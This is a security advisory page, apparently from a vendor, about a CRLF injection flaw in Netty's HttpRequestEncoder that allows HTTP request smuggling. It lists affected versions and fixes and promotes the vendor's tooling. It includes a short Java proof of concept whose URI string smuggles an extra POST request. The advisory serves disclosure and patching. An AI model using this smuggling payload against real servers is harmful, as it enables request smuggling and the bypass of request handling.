GHSA-84h7-rjj3-6jx4
MEDIUMNetty has a CRLF Injection vulnerability in io.netty.handler.codec.http.HttpRequestEncoder
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
io.netty:netty-codec-http☕io.netty:netty-codec-httpReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Maven packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The io.netty.handler.codec.http.HttpRequestEncoder CRLF injection with the request uri when constructing a request. This leads to request smuggling when HttpRequestEncoder is used without proper sanitization of the uri.
Details
The HttpRequestEncoder simply UTF8 encodes the uri without sanitization (buf.writeByte(SP).writeCharSequence(uriCharSequence, CharsetUtil.UTF_8);)
The default implementation of HTTP headers guards against such possibility already with a validator making it impossible with headers.
PoC
Simple reproducer:
public static void main(String[] args) {
EmbeddedChannel client = new EmbeddedChannel();
client.pipeline().addLast(new HttpClientCodec());
EmbeddedChannel server = new EmbeddedChannel();
server.pipeline().addLast(new HttpServerCodec());
server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
@Override
public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
System.out.println("Processing msg " + msg);
}
});
DefaultHttpRequest request = new DefaultHttpRequest(
HttpVersion.HTTP_1_1,
HttpMethod.GET,
"/s1 HTTP/1.1\r\n" +
"\r\n" +
"POST /s2 HTTP/1.1\r\n" +
"content-length: 11\r\n\r\n" +
"Hello World" +
"GET /s1"
);
client.writeAndFlush(request);
ByteBuf tmp;
while ((tmp = client.readOutbound()) != null) {
server.writeInbound(tmp);
}
}
Impact
Any application / framework using HttpRequestEncoder can be subject to be abused to perform request smuggling using CRLF injection.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| ☕Maven | io.netty:netty-codec-http | ≥ 4.2.0.Alpha1&&< 4.2.8.Final | 4.2.8.Final |
| ☕Maven | io.netty:netty-codec-http | all versions | 4.1.129.Final |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for io.netty:netty-codec-http. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update io.netty:netty-codec-http to 4.2.8.Final or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-84h7-rjj3-6jx4 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-84h7-rjj3-6jx4 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-84h7-rjj3-6jx4. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-84h7-rjj3-6jx4 in your dependencies?
O3 detects GHSA-84h7-rjj3-6jx4 across Maven dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.